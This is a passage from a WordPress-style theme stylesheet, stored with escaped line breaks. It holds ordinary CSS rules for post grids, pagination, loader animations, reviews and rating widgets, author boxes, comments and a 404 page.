1.875em;\r\n\tline-height:1.2857em;\r\n}\r\n.post_item_colored_4 .post_descr .post_price_value {\r\n\tfont-size: 1.5em;\r\n\tline-height:1.2857em;\r\n}\r\n.post_item_colored .post_descr .post_price_period {\r\n\tfont-size: 1.125em;\r\n\tline-height:1.2857em;\r\n\tcolor: #909090;\r\n}\r\n.post_item_colored_4 .post_descr .post_price_period {\r\n\tfont-size: 1em;\r\n\tline-height:1.2857em;\r\n}\r\n.post_item_colored .post_descr .post_price_period:before {\r\n\tcontent:'/';\r\n\tdisplay:inline-block;\r\n\tmargin:0 0.5em;\r\n}\r\n.post_item_colored .post_content.ih-item.square.colored .post_info_wrap.info {\r\n\tpadding:0;\r\n\ttext-align:left;\r\n}\r\n.post_item_colored .post_content.ih-item.square.colored .post_info_wrap.info .post_title {\r\n\tfont-size:1.625em;\r\n\tline-height:1.15em;\r\n\tpadding:4px 8%;\r\n\ttext-align:left;\r\n\tmargin-top:8%;\r\n}\r\n.post_item_colored_4 .post_content.ih-item.square.colored .post_info_wrap.info .post_title {\r\n\tfont-size:1.125em;\r\n\tline-height:1.15em;\r\n\tmargin-top:4%;\r\n}\r\n.post_item_colored .post_content.ih-item.square.colored .post_info_wrap.info .post_descr,\r\n.post_item_colored .post_content.ih-item.square.colored .post_info_wrap.info .post_descr p {\r\n\ttext-align:left;\r\n\tpadding: 0.5em 8% 0;\r\n\tfont-style:normal;\r\n}\r\n.post_item_colored .post_content.ih-item.square.colored .post_info_wrap.info .post_descr p {\r\n\tfont-size:0.875em;\r\n\tpadding:0;\r\n}\r\n.post_item_colored .post_content.ih-item.square.colored .post_info_wrap.info .post_descr p.post_info {\r\n\tmargin-bottom:2em;\r\n}\r\n.post_item_colored .post_info_wrap .post_buttons {\r\n\tposition:absolute;\r\n\tleft:8%; \t/*1.875em;*/\r\n\tright:8%;\r\n\tbottom:1.875em;\r\n\theight:3em;\r\n\toverflow:hidden;\r\n\tpadding:0 0 0 4px;\r\n}\r\n.post_item_colored_4 .post_info_wrap .post_buttons {\r\n\tbottom:1.125em;\r\n\theight:2.3em;\r\n\twhite-space:nowrap;\r\n}\r\n.post_item_colored .post_info_wrap .post_button {\r\n\tfloat:none;\r\n\tdisplay:inline-block;\r\n}\r\n.post_item_colored .post_info_wrap .post_button+.post_button {\r\n\tmargin-left:0.625em;\r\n}\r\n.post_item_colored_4 .post_info_wrap .post_button .sc_button {\r\n\tpadding:0.5em 0.75em;\r\n}\r\n\r\n\r\n/* Colored excerpt */\r\n.isotope_wrap .isotope_item_colored_1 {\r\n\twidth:100%;\r\n}\r\n.isotope_wrap .isotope_item_colored_1 .post_item {\r\n\toverflow:hidden;\r\n\tposition:relative;\r\n}\r\n.isotope_wrap .isotope_item_colored_1 .post_featured {\r\n\twidth: 250px;\r\n\theight: 250px;\r\n\tfloat: left;\r\n\tborder-right:20px solid #f0f0f0;\r\n\tmargin-right:1.875em;\r\n}\r\n.isotope_wrap .isotope_item.isotope_item_colored_1 .post_description {\r\n\tpadding-right: 2em;\r\n}\r\n.isotope_wrap .isotope_item.isotope_item_colored_1 .post_title {\r\n\tmargin-top: 0.8em; \r\n\tmargin-bottom: 0.25em;\r\n}\r\n.isotope_wrap .isotope_item.isotope_item_colored_1 .post_descr {\r\n\tmax-height:6em;\r\n\tmargin-top:1em;\r\n\tmargin-bottom:1em;\r\n\toverflow:hidden;\r\n}\r\n.isotope_wrap .isotope_item.isotope_item_colored_1 .post_buttons {\r\n\ttext-align:right;\r\n\twhite-space:nowrap;\r\n}\r\n.isotope_wrap .isotope_item.isotope_item_colored_1 .post_buttons a {\r\n\tfloat:none;\r\n\tdisplay:inline-block;\r\n\tmargin-left:10px;\r\n}\r\n\r\n\r\n\r\n\r\n/* 7.7 Paginations\r\n-------------------------------------------------------------- */\r\n\r\n/* Blog pagination */\r\n.pagination_wrap {\r\n\ttext-align:center;\r\n\tposition:relative;\r\n}\r\n.pagination_wrap:after {\r\n\tcontent:\" \";\r\n\tdisplay:block;\r\n\twidth:100%;\r\n\theight:0;\r\n\tclear:both;\r\n}\r\n.pagination_single > .pager_numbers,\r\n.pagination_single a,\r\n.pagination_slider .pager_cur,\r\n.pagination_pages > a,\r\n.pagination_pages > span {\r\n\tborder:2px solid #ddd;\r\n}\r\n.pagination_slider .pager_slider {\r\n\tborder:1px solid #ddd;\r\n}\r\n.pagination_wrap .pager_next,\r\n.pagination_wrap .pager_prev,\r\n.pagination_wrap .pager_last,\r\n.pagination_wrap .pager_first {\r\n\tborder: none !important;\r\n\tbackground-color: transparent !important;\r\n}\r\n.pagination_wrap .pager_next {\r\n\tmargin-left:0.6em;\r\n}\r\n.pagination_wrap .pager_prev {\r\n\tmargin-right:1em;\r\n}\r\n.pagination_wrap .pager_next:before {\r\n\tfont-family:fontello;\r\n\tcontent: '\\e836';\r\n\tmargin-right:0;\r\n}\r\n.pagination_wrap .pager_prev:before {\r\n\tfont-family:fontello;\r\n\tcontent: '\\e837';\r\n\tmargin-right:0;\r\n}\r\n.pagination_wrap .pager_last:before {\r\n\tfont-family:fontello;\r\n\tcontent: '\\e836\\e836';\r\n\tmargin-right:0;\r\n\tletter-spacing:-7px;\r\n}\r\n.pagination_wrap .pager_first:before {\r\n\tfont-family:fontello;\r\n\tcontent: '\\e837\\e837';\r\n\tmargin-right:0;\r\n\tletter-spacing:-7px;\r\n}\r\n.pagination_wrap .pager_next:hover,\r\n.pagination_wrap .pager_prev:hover,\r\n.pagination_wrap .pager_last:hover,\r\n.pagination_wrap .pager_first:hover {\r\n\tbackground-color:transparent;\r\n}\r\n\r\n\r\n/* Pagination single page parts */\r\n.pagination_single {\r\n\tmargin-bottom: 2em;\r\n}\r\n.pagination_single > .pager_pages {\r\n\tmargin-right:0.5em;\r\n}\r\n.pagination_lessons {\r\n\tmargin-top: 2em;\r\n\tmargin-bottom: 3em;\r\n\toverflow:hidden;\r\n}\r\n.pagination_lessons .pager_prev {\r\n\tfloat:left;\r\n\tmargin-right:2em;\r\n\tmargin-top:1em;\r\n}\r\n.pagination_lessons .pager_next {\r\n\tfloat:right;\r\n\tmargin-top:1em;\r\n}\r\n\r\n/* Style 'Pages' and 'Slider' */\r\n.pagination_single > .pager_numbers,\r\n.pagination_single a,\r\n.pagination_slider .pager_cur,\r\n.pagination_pages > a,\r\n.pagination_pages > span {\r\n\tdisplay:inline-block;\r\n\tmargin: 0 4px 4px 0;\r\n\ttext-align:center;\r\n\tpadding:0.7143em 0.8em;\r\n\tfont-size:0.875em;\r\n\tline-height: 0.875em;\r\n\t-webkit-border-radius: 5px !important;\r\n\t-moz-border-radius: 5px !important;\r\n\tborder-radius: 5px !important;\r\n}\r\n\r\n.pagination_slider .pager_pages {\r\n\tdisplay:inline-block;\r\n\tposition:relative;\r\n\tz-index:1000;\r\n}\r\n.pagination_slider .pager_cur {\r\n\tcursor:pointer;\r\n}\r\n.pagination_slider .pager_slider {\r\n\tdisplay:none;\r\n\tposition:absolute;\r\n\tbottom:3.5em;\r\n\tleft:50%;\r\n\t-webkit-transform: translateX(-50%);\r\n\t-moz-transform: translateX(-50%);\r\n\ttransform: translateX(-50%);\r\n\tpadding: 1em;\r\n\toverflow: hidden;\r\n}\r\n.pagination_slider .pager_slider .sc_slider {\r\n\twidth: 300px;\r\n\theight:230px;\r\n}\r\n.pagination_slider .pager_slider .sc_slider_swiper:hover .sc_slider_prev {\r\n\tmargin-left:0;\r\n}\r\n.pagination_slider .pager_slider .sc_slider_swiper:hover .sc_slider_next {\r\n\tmargin-right:0;\r\n}\r\n.pagination_slider .pager_slider .pager_numbers table {\r\n\tfont-size:1.8em;\r\n\tfont-weight:300;\r\n}\r\n.pagination_slider .pager_slider .pager_numbers table td {\r\n\tvertical-align:middle;\r\n\tpadding:0;\r\n\tmargin:0;\r\n\tborder:none;\r\n}\r\n.pagination_slider .pager_slider .pager_numbers table td a {\r\n\tdisplay: block;\r\n\ttext-align:center;\r\n\twidth:58px;\r\n\tline-height:2em;\r\n}\r\n.pagination_slider .pager_slider .pager_numbers table td a.active,\r\n.pagination_slider .pager_slider .pager_numbers table td a:hover {\r\n\tfont-weight: 700;\r\n}\r\n.pagination_slider .pager_slider .pager_numbers table td a.active {\r\n\tcolor:#666666;\r\n\tcursor:default;\r\n}\r\n\r\n\r\n/* Style 'Load more' */\r\n.pagination_viewmore > a {\r\n\tdisplay:inline-block;\r\n\ttext-align:center;\r\n\tpadding:0.75em 1.5em;\r\n\tfont-size:0.875em;\r\n\tfont-weight:700;\r\n\tline-height: 1.2857em;\r\n}\r\n.pagination_viewmore .viewmore_loading,\r\n.pagination_viewmore .viewmore_text_2 {\r\n\tdisplay:none;\r\n}\r\n.pagination_viewmore.loading .viewmore_text_1 {\r\n\tdisplay:none;\r\n}\r\n.pagination_viewmore.loading .viewmore_loading,\r\n.pagination_viewmore.loading .viewmore_text_2 {\r\n\tdisplay:inline-block;\r\n}\r\n\r\n/* Style 'Infinite' */\r\n.pagination_infinite {\r\n\theight:0;\r\n}\r\n.pagination_infinite #viewmore_link {\r\n\tdisplay:none;\r\n}\r\n\r\n/* Loader picture */\r\n.pagination_wrap.loading {\r\n\theight:1.2857em;\r\n\tpadding: 10px 0;\r\n}\r\n.viewmore_loader,\r\n.mfp-preloader span,\r\n.sc_video_frame.sc_video_active:before {\r\n\tcontent: ' ';\r\n\tdisplay: block;\r\n\tposition: absolute;\r\n\ttop: 50%;\r\n\tleft: 50%;\r\n\tright:auto;\r\n}\r\n.viewmore_loader {\r\n\tdisplay:none;\r\n\twidth: 50px;\r\n\theight: 50px;\r\n\tz-index: 1;\r\n\tmargin: -25px 0 0 -25px;\r\n}\r\n.loading * {\r\n\tdisplay: none !important;\r\n}\r\n.loading > .viewmore_loader {\r\n\tdisplay:block !important;\r\n}\r\n.loading > .viewmore_loader,\r\n.mfp-preloader span,\r\n.sc_video_frame.sc_video_active:before {\r\n\t-webkit-animation: rotateplane 1.2s infinite ease-in-out;\r\n\tanimation: rotateplane 1.2s infinite ease-in-out;\r\n}\r\n@-webkit-keyframes rotateplane {\r\n\t0% {\r\n\t\t-webkit-transform: perspective(120px); \r\n\t\ttransform: perspective(120px);\r\n\t}\r\n\t50% {\r\n\t\t-webkit-transform: perspective(120px) rotateY(180deg); \r\n\t\ttransform: perspective(120px) rotateY(180deg);\r\n\t}\r\n\t100% {\r\n\t\t-webkit-transform: perspective(120px) rotateY(180deg) rotateX(180deg); \r\n\t\ttransform: perspective(120px) rotateY(180deg) rotateX(180deg);\r\n\t}\r\n}\r\n@keyframes rotateplane {\r\n\t0% {\r\n\t\t-webkit-transform: perspective(120px); \r\n\t\ttransform: perspective(120px);\r\n\t}\r\n\t50% {\r\n\t\t-webkit-transform: perspective(120px) rotateY(180deg); \r\n\t\ttransform: perspective(120px) rotateY(180deg);\r\n\t}\r\n\t100% {\r\n\t\t-webkit-transform: perspective(120px) rotateY(180deg) rotateX(180deg); \r\n\t\ttransform: perspective(120px) rotateY(180deg) rotateX(180deg);\r\n\t}\r\n}\r\n\r\n\r\n\r\n\r\n/* 8. Single page parts\r\n-------------------------------------------------------------- */\r\n.post_content.post_content_editor_present {\r\n\tposition:relative;\r\n}\r\n.post_item_attachment > .post_title,\r\n.post_item_single > .post_title {\r\n\tmargin-top:0;\r\n}\r\n.post_info .frontend_editor_buttons {\r\n\tfloat:right;\r\n}\r\n.post_info .frontend_editor_buttons [class*=\"icon-\"]:before {\r\n\tmargin-right:0.5em;\r\n}\r\n\r\n/* 8.1 Attachment and Portfolio post navigation\r\n------------------------------------------------------------ */\r\n.post_featured .post_nav {\r\n\tposition:relative;\r\n}\r\n.post_featured .post_nav_item {\r\n\tdisplay:block;\r\n\tposition:absolute;\r\n\tleft:0;\r\n\ttop:50%;\r\n\twidth:50%;\r\n\theight:60px;\r\n\tcolor:#3a3a3a;\r\n\tmargin-top:-80px;\r\n\toverflow:hidden;\r\n\tpadding: 50px 0;\r\n}\r\n.post_featured .post_nav_next {\r\n\tleft:auto;\r\n\tright:0;\r\n}\r\n.post_featured .post_nav_item:before {\r\n\tposition:absolute;\r\n\tdisplay:block;\r\n\ttop:50px;\r\n\tleft: 25px;\r\n\twidth:58px;\r\n\theight:58px;\r\n\tline-height:58px;\r\n\tfont-size:25px;\r\n\tfont-family: \"fontello\";\r\n\tborder:1px solid #ddd;\r\n\tbackground-color: rgba(255,255,255, 0.8);\r\n\tcolor:#888888;\r\n\ttext-align:center;\r\n\topacity: 0;\r\n\tfilter: alpha(opacity=0);\r\n}\r\n.post_featured .post_nav:hover .post_nav_item:before { \r\n\topacity: 1;\r\n\tfilter: alpha(opacity=100);\r\n}\r\n.post_featured .post_nav:hover .post_nav_prev:hover:before {\r\n\topacity: 0;\r\n\tfilter: alpha(opacity=0);\r\n\tleft: -60px;\r\n}\r\n.post_featured .post_nav:hover .post_nav_next:hover:before {\r\n\topacity: 0;\r\n\tfilter: alpha(opacity=0);\r\n\tright: -60px;\r\n}\r\n.post_featured .post_nav .post_nav_prev:before {\r\n\tcontent:'\\e837';\r\n}\r\n.post_featured .post_nav .post_nav_next:before {\r\n\tcontent:'\\e836';\r\n\tleft: auto;\r\n\tright: 25px;\r\n}\r\n\r\n/* Info block */\r\n.post_featured .post_nav_item .post_nav_info {\r\n\tdisplay:block;\r\n\theight:60px;\r\n\twidth:auto;\r\n\tfloat: left;\r\n\tpadding: 0 25px;\r\n\tmargin-left:-300px;\r\n\toverflow: hidden;\r\n\tmax-width:160px;\r\n\tbackground-color: rgba(255,255,255, 0.8);\r\n\tline-height:1.5em;\r\n}\r\n.post_featured .post_nav_next .post_nav_info {\r\n\tfloat:right;\r\n\tmargin-left: 0;\r\n\tmargin-right: -300px;\r\n}\r\n.post_featured .post_nav .post_nav_info_title {\r\n\tdisplay:block;\r\n\tpadding-top: 8px;\r\n\tline-height:1.2857em;\r\n}\r\n.post_featured .post_nav .post_nav_info_description {\r\n\tfont-size: 0.75em;\r\n\tline-height:1.5em;\r\n}\r\n\r\n.post_featured .post_nav_prev:hover .post_nav_info {\r\n\tmargin-left: -6px;\r\n}\r\n.post_featured .post_nav_next:hover .post_nav_info {\r\n\tmargin-right: -6px;\r\n}\r\n\r\n.post_featured .post_nav_item .post_nav_info {\r\n\t-webkit-transition: all 0.6s ease-out;\r\n\t-moz-transition: all 0.6s ease-out;\r\n\t-ms-transition: all 0.6s ease-out;\r\n\t-o-transition: all 0.6s ease-out;\r\n\ttransition: all 0.6s ease-out;\r\n\t-webkit-transition-delay: 0.15s;\r\n\t-o-transition-delay: 0.15s;\r\n\t-moz-transition-delay: 0.15s;\r\n\ttransition-delay: 0.15s;\r\n}\r\n.post_featured .post_nav_item:before {\r\n\t-webkit-transition: all 0.3s ease-out;\r\n\t-moz-transition: all 0.3s ease-out;\r\n\t-ms-transition: all 0.3s ease-out;\r\n\t-o-transition: all 0.3s ease-out;\r\n\ttransition: all 0.3s ease-out;\r\n}\r\n\r\n\r\n/* 8.2 Reviews block\r\n-------------------------------------------------------------- */\r\n\r\n.reviews_block { \r\n\twidth: 270px;\r\n\toverflow: hidden;\r\n}\r\n.widget_area .reviews_block { \r\n\twidth: 100%;\r\n}\r\n.reviews_block .sc_tabs_content {\r\n\toverflow:hidden;\r\n\tborder: 1px solid #f4f7f9;\r\n}\r\n.widget_area .reviews_block .sc_tabs_content {\r\n\tborder:none;\r\n}\r\n.reviews_block.sc_tabs.sc_tabs_style_2 .sc_tabs_content {\r\n\tpadding:0;\r\n}\r\n.reviews_block.sc_tabs .sc_tabs_titles li {\r\n\tfont-size:0.875em;\r\n}\r\n.reviews_block.sc_tabs.sc_tabs_style_2 .sc_tabs_titles li a {\r\n\tpadding: 0.25em 0.5em;\r\n}\r\n.reviews_block .reviews_editor {\r\n\tpadding:1em;\r\n}\r\n.widget_area .reviews_block .reviews_editor {\r\n\tpadding:0 0 1em 0;\r\n}\r\n.reviews_block .reviews_accept {\r\n\tpadding-top:0.5em;\r\n\tpadding-bottom:1.5em;\r\n\ttext-align:center;\r\n\tdisplay:none;\r\n}\r\n.reviews_block .reviews_item { \r\n\twhite-space:nowrap;\r\n\tpadding:0.3em 0;\r\n}\r\n.reviews_block .reviews_criteria,\r\n.reviews_block .reviews_stars { \r\n\tdisplay: inline-block;\r\n\tvertical-align:top;\r\n}\r\n.reviews_block .reviews_criteria {\r\n\twidth:40%;\r\n\twhite-space:normal;\r\n}\r\n.reviews_block .reviews_max_level_100 .reviews_criteria {\r\n\theight:1.7857em;\r\n\tline-height:1.7857em;\r\n\tfont-size:0.875em;\r\n}\r\n.reviews_block .reviews_stars {\r\n\twidth: 60%;\r\n\twhite-space:nowrap;\r\n\tposition:relative;\r\n}\r\n.reviews_block .reviews_value {\r\n\tdisplay:inline-block;\r\n\tvertical-align:top;\r\n\twidth:10%;\r\n\ttext-align:right;\r\n\tfont-size:0.875em;\r\n\tline-height:1.5em;\r\n\tposition:absolute;\r\n\ttop: 0;\r\n\tright:3px;\r\n}\r\n.reviews_block .reviews_max_level_100 .reviews_value {\r\n\twidth:17%;\r\n}\r\n.widget_area .reviews_block .reviews_max_level_100 .reviews_value {\r\n\twidth:25%;\r\n}\r\n.reviews_block .reviews_stars_wrap {\r\n\tdisplay:inline-block;\r\n\tvertical-align:top;\r\n\tposition:relative;\r\n}\r\n.reviews_block .reviews_max_level_100 .reviews_stars_wrap {\r\n\twidth: 80%;\r\n}\r\n.widget_area .reviews_block .reviews_max_level_100 .reviews_stars_wrap {\r\n\twidth: 70%;\r\n}\r\n.reviews_block .reviews_editable .reviews_criteria,\r\n.reviews_block .reviews_editable .reviews_stars_wrap {\r\n\tcursor: pointer;\r\n}\r\n.reviews_block .reviews_stars_hover {\r\n\tposition:absolute;\r\n\tleft:0;\r\n\ttop:0;\r\n\twhite-space:nowrap;\r\n\toverflow:hidden;\r\n}\r\n.reviews_block .reviews_max_level_100 .reviews_stars_bg {\r\n\tbackground-color: #f4f7f9;\r\n\theight:1.5625em;\r\n}\r\n.reviews_block .reviews_max_level_100 .reviews_stars_hover {\r\n\tbackground-color: #666666;\r\n\theight:1.5625em;\r\n}\r\n.reviews_block .reviews_slider {\r\n\tdisplay:none;\r\n\tbackground-color: #666666;\r\n\theight: 6px;\r\n\twidth: 8px;\r\n\tposition: absolute;\r\n\tbottom: 4px;\r\n\tleft: 0;\r\n\t-webkit-box-shadow: -1px 1px 1px 0px rgba(0, 0, 0, 0.2);\r\n\t-moz-box-shadow: -1px 1px 1px 0px rgba(0, 0, 0, 0.2);\r\n\tbox-shadow: -1px 1px 1px 0px rgba(0, 0, 0, 0.2);\r\n}\r\n.reviews_block .reviews_editable .reviews_max_level_100  .reviews_slider {\r\n\tdisplay:block;\r\n}\r\n.reviews_block .reviews_max_level_100 .reviews_slider {\r\n\tbottom: -10px;\r\n}\r\n.reviews_block .reviews_slider:before {\r\n\tcontent: ' ';\r\n\tdisplay: block;\r\n\theight: 7px;\r\n\twidth: 7px;\r\n\tbackground-color: inherit;\r\n\tmargin: -3px 0 0 0;\r\n\t-webkit-transform: rotate(45deg);\r\n\t-moz-transform: rotate(45deg);\r\n\t-o-transform: rotate(45deg);\r\n\t-ms-transform: rotate(45deg);\r\n\ttransform: rotate(45deg);\r\n}\r\n\r\n.reviews_star {\r\n\tdisplay: inline-block;\r\n\tmargin: 0;\r\n\tpadding: 0; \r\n\tfont-size: 0.7em;\r\n\tvertical-align: top; \r\n\tmargin-right: 3px;\r\n} \r\n.reviews_max_level_10 .reviews_star {\r\n\tfont-size: 0.875em;\r\n} \r\n.reviews_star:before {\r\n\tcontent: '\\e8c8';\r\n\tfont-family: \"fontello\";\r\n\tfont-size:inherit;\r\n\tdisplay: inline-block;\r\n\tvertical-align:top;\r\n\ttext-align: center;\r\n}\r\n.reviews_stars_hover .reviews_star:before {\r\n\tcontent: '\\e820';\r\n}\r\n\r\n.reviews_block .reviews_max_level_100 .reviews_value:after {\r\n\tcontent: '%';\r\n}\r\n\r\n/* Summary */\r\n.reviews_block .reviews_summary {\r\n\tbackground-color: #f4f7f9;\r\n\toverflow:hidden;\r\n}\r\n.reviews_block .reviews_summary .reviews_item {\r\n\theight: 7.375em;\r\n\tpadding:0;\r\n\toverflow:hidden;\r\n\tbackground-image:url(images/rating_summary_bg.png);\r\n\tbackground-position:right top;\r\n\tbackground-repeat:no-repeat;\r\n\tbackground-size:100% 100%;\r\n}\r\n.reviews_block .reviews_summary .reviews_stars_wrap {\r\n\tdisplay:none;\r\n}\r\n\r\n.reviews_block .reviews_summary .reviews_criteria {\r\n\tposition:static;\r\n\tdisplay:block;\r\n\tfloat:left;\r\n\tpadding: 1.15em 1.15em 0;\r\n\twidth:53.8462%;\t/* 210px; */\r\n\theight:6.1428em;\r\n\tcolor:#222222;\r\n\tfont-size:0.875em;\r\n\tline-height:1.5em;\r\n\toverflow:hidden;\r\n}\r\n.widget_area .reviews_block .reviews_summary .reviews_criteria {\r\n\twidth:40%;\r\n\theight:10em;\r\n\tpadding: 0.85em 0.85em 0;\r\n\tfont-size:0.75em;\r\n\tline-height:1.2857em;\r\n}\r\n.reviews_block .reviews_summary .reviews_stars {\r\n\tfloat:right;\r\n\twidth: 30.7692%;\t/* 120px; */\r\n\theight:7.375em;\r\n\tposition:relative;\r\n\toverflow:hidden;\r\n\ttext-align:center;\r\n}\r\n.widget_area .reviews_block .reviews_summary .reviews_stars {\r\n\twidth: 40%;\r\n}\r\n.reviews_block .reviews_summary .reviews_value {\r\n\ttop:0;\r\n\twidth:100%;\r\n\theight:2.3em;\r\n\tline-height:2.3em;\r\n\tfont-size:3em;\r\n\tfont-weight:300;\r\n\tcolor:#ffffff;\r\n\ttext-align:right;\r\n}\r\n.widget_area .reviews_block .reviews_summary .reviews_value {\r\n\twidth:100%;\r\n\tfont-size:2.25em;\r\n\tline-height:3em;\r\n\t-webkit-box-sizing: border-box;\r\n\tbox-sizing: border-box;\r\n\ttext-align: center;\r\n\tpadding-left: 10px;\r\n}\r\n\r\n/* Summary stars in the post item (under the title) */\r\n.post_rating {\r\n\tmargin-bottom:6px;\r\n\toverflow:hidden;\r\n}\r\n.post_rating .reviews_stars_wrap {\r\n\twhite-space:nowrap;\r\n}\r\n.post_rating .reviews_stars_wrap {\r\n\tposition:relative;\r\n\theight:1em;\r\n\t/*width:92px;*/\r\n\tdisplay:inline-block;\r\n\tvertical-align:top;\r\n\t-webkit-box-sizing: border-box;\r\n\t-moz-box-sizing: border-box;\r\n\tbox-sizing: border-box;\r\n}\r\n.post_rating .reviews_value {\r\n\tdisplay:none;\r\n\tvertical-align:top;\r\n\tfont-size:0.875em;\r\n\tfont-weight:400;\r\n\tmargin-left:0.5em;\r\n\r\n}\r\n.post_rating .reviews_stars_bg,\r\n.post_rating .reviews_stars_hover {\r\n\twhite-space:nowrap;\r\n\toverflow:hidden;\r\n}\r\n.post_rating .reviews_stars_hover {\r\n\tposition:absolute;\r\n\tleft:0;\r\n\ttop:0;\r\n}\r\n\r\n\r\n\r\n/* 8.3 Post author\r\n------------------------------------------------------ */\r\n\r\n.post_author {\r\n\tmargin-bottom: 2em;\r\n\tpadding:1.25em 1.85em;\r\n\toverflow:hidden;\r\n}\r\n.post_author .post_author_avatar {\r\n\tfloat:left;\r\n\tmargin: 0 20px 10px 0;\r\n\toverflow:hidden;\r\n\twidth: 75px;\r\n\theight:75px;\r\n}\r\n.post_author .post_author_title {\r\n\tmargin-top:0;\r\n}\r\n.post_author .post_author_info {\r\n\toverflow:hidden;\r\n}\r\n.post_author .post_author_info p {\r\n\tmargin:0;\r\n}\r\n.post_author .post_author_info p+p {\r\n\tmargin-top:0.5em;\r\n}\r\n.post_author .post_author_info .sc_socials {\r\n\tmargin-top: 0.5em;\r\n}\r\n\r\n\r\n/* 8.4 Comments\r\n-------------------------------------------------------- */\r\n.comments_wrap {\r\n\tmargin-top: 3em;\r\n}\r\n.body_style_fullscreen .comments_wrap {\r\n\tmargin-bottom: 3em;\r\n}\r\n.comments_list_wrap ul.children,\r\n.comments_list_wrap ul > li + li {\r\n\tpadding-top: 1.25em;\r\n\tmargin-top: 1.25em;\r\n\tborder-top-width: 2px;\r\n\tborder-top-style: solid;\r\n}\r\n.comments_wrap .comment-respond {\r\n\tpadding-bottom:4px;\r\n}\r\n.comments_list_wrap .comment-respond {\r\n\tpadding-bottom: 1.25em;\r\n\tmargin-bottom: 1.25em;\r\n\tborder-bottom-width: 2px;\r\n\tborder-bottom-style: solid;\r\n}\r\n.comments_list_wrap > ul {\r\n\tpadding-bottom: 1.25em;\r\n\tborder-bottom-width: 2px;\r\n\tborder-bottom-style: solid;\r\n}\r\n.comments_list_wrap ul > li + li > .comment_author_avatar {\r\n\ttop: 1.5em;\r\n}\r\n\r\n\r\n/* Trackbacks and pingbacks */\r\n.comments_list > li.trackback {\r\n\tlist-style:none;\r\n\tmargin-left:0;\r\n\tpadding-left:0;\r\n\tpadding-right:4em;\r\n\tmin-height: 0;\r\n\tposition:relative;\r\n}\r\n.comments_list > li.trackback p {\r\n\tfont-style:italic;\r\n\tpadding-bottom:0.8em;\r\n}\r\n.comments_list > li.trackback p a { font-style:normal; }\r\n.comments_list > li.trackback .edit-link { \r\n\tposition:absolute;\r\n\tright:0;\r\n\ttop: 0;\r\n}\r\n.comments_list > li+li.trackback .edit-link { \r\n\tmargin-top: 1.25em;\r\n}\r\n\r\n/* Comment list */\r\n.comments_list_wrap .comments_closed {\r\n\tmargin-top:2em;\r\n\tcolor:#222222;\r\n}\r\n.comments_list_wrap .comments_list_title {\r\n\tmargin-top:0;\r\n}\r\n.comments_list_wrap > ul {\r\n\tpadding:0;\r\n\tmargin:0;\r\n\tlist-style: none;\r\n}\r\n.comments_list_wrap ul > li {\r\n\toverflow:hidden;\r\n\tposition:relative;\r\n\tmin-height:5em;\r\n}\r\n.comments_list_wrap ul > li:before {\r\n\tdisplay:none;\r\n}\r\n.comments_list_wrap ul ul {\r\n\t/* padding-left:105px; */\t/* This way for more long border under previous item */\r\n\tmargin-left:105px;\t\t\t/* This way for more short border under previous item */\r\n}\r\n.comments_list_wrap ul ul ul ul ul {\r\n\t/* padding-left:0; */\r\n\tmargin-left:0;\r\n}\r\n\r\n.comments_list_wrap .comment_author_avatar {\r\n\tposition: absolute;\r\n\tleft:0;\r\n\ttop: 0.25em;\r\n\tz-index:1;\r\n\twidth:75px;\r\n\theight:75px;\r\n}\r\n.comments_list_wrap .comment_content {\r\n\tpadding-left:105px;\r\n}\r\n\r\n.comments_list_wrap .comment_info {\r\n\tfont-size:0.875em;\r\n\tmargin-bottom:0.5em;\r\n}\r\n.comments_list_wrap .comment_info > span + span:before {\r\n\tcontent: \"|\";\r\n\tdisplay:inline-block;\r\n\tmargin: 0 0.8em;\r\n}\r\n.comments_list_wrap .comment_info .comment_date_label {\r\n\tfont-style:italic;\r\n}\r\n\r\n.comments_list_wrap .comment_not_approved {\r\n\tpadding: 0 0 0.5em 0;\r\n\tfont-style:italic;\r\n\tfont-weight:300;\r\n}\r\n\r\n.comments_list_wrap .comment_text {\r\n\tmargin-bottom:0.5em;\r\n}\r\n.comments_list_wrap .comment_text p {\r\n\tmargin:0;\r\n}\r\n.comments_list_wrap .comment_text p+p {\r\n\tmargin-top: 0.5em;\r\n}\r\n.comments_list_wrap .comment_text ul {\r\n\tmargin:0;\r\n\tpadding: 0 0 0 1.5em;\r\n\tlist-style:outside;\r\n}\r\n.comments_list_wrap .comment_text ul > li > ul {\r\n\tmargin-top: 0.5em;\r\n}\r\n.comments_list_wrap .comment_text ul > li {\r\n\tmin-height:0;\r\n\tborder:none;\r\n\tpadding:0;\r\n\tmargin:0 0 0.5em 0;\r\n\toverflow:visible;\r\n}\r\n\r\n.comments_list_wrap .comment_reply a {\r\n\tfont-size:0.875em;\r\n}\r\n.comments_list_wrap .comment_reply a:before {\r\n\tcontent:'\\e802';\r\n\tfont-family: fontello;\r\n\tmargin-right:0.5em;\r\n}\r\n\r\n\r\n/* Comments form */\r\n.comments_wrap .comment-reply-title {\r\n\tdisplay:none;\r\n}\r\n.comments_wrap .comments_list_wrap .comment-reply-title {\r\n\tdisplay:block;\r\n}\r\n\r\n.comments_wrap .comments_notes {\r\n\tfont-size:0.875em;\r\n\tcolor:#909090;\r\n}\r\n.comments_wrap .comments_field  {\r\n\tmargin-bottom:20px;\r\n\twidth: 100%;\r\n}\r\n\r\n.comments_wrap .comments_field label {\r\n\tdisplay:none;\r\n}\r\n.comments_wrap .comments_field input,\r\n.comments_wrap .comments_field textarea {\r\n\twidth:100%;\r\n\tpadding:0.75em 1em;\r\n}\r\n\r\n/* Submit button */\r\n.comments_form_wrap {\r\n\tpadding-bottom:4px;\t\t/* To show shadow under button */\r\n\t    margin-top: 3em;\r\n}\r\n.comments_wrap .form-submit { \r\n\ttext-align:left;\r\n\tmargin:0;\r\n\tpadding-left:4px;\r\n}\r\n.comments_wrap .form-submit input[type=\"submit\"],\r\n.comments_wrap .form-submit input[type=\"button\"] {\r\n\ttext-transform:uppercase;\r\n}\r\n\r\n\r\n\r\n\r\n/* 8.5 Page 404\r\n-------------------------------------------------------------- */\r\n.article_style_boxed .post_item_404 {\r\n\tpadding:1px 0;\r\n}\r\n\r\n.post_item.post_item_404 .post_content{\r\n\tpadding: 1.8em 0 0.2em 0;\r\n\tbackground: white;\r\n\tposition: relative;\r\n\ttop: 10.5em;\r\n\tmargin-bottom: 21em;\r\n}\r\n\r\n.post_item.post_item_404 .search_wrap .search_results .post_content\r\n{    top: 0em;\r\n    margin-bottom: 5px;\r\n}\r\n\r\n.post_item.post_item_404 .background_cover{\r\n\ttransform: translateX(-50%);\r\n\t-webkit-transform: translateX(-50%);\r\n\t-moz-transform: translateX(-50%);\r\n\tposition: 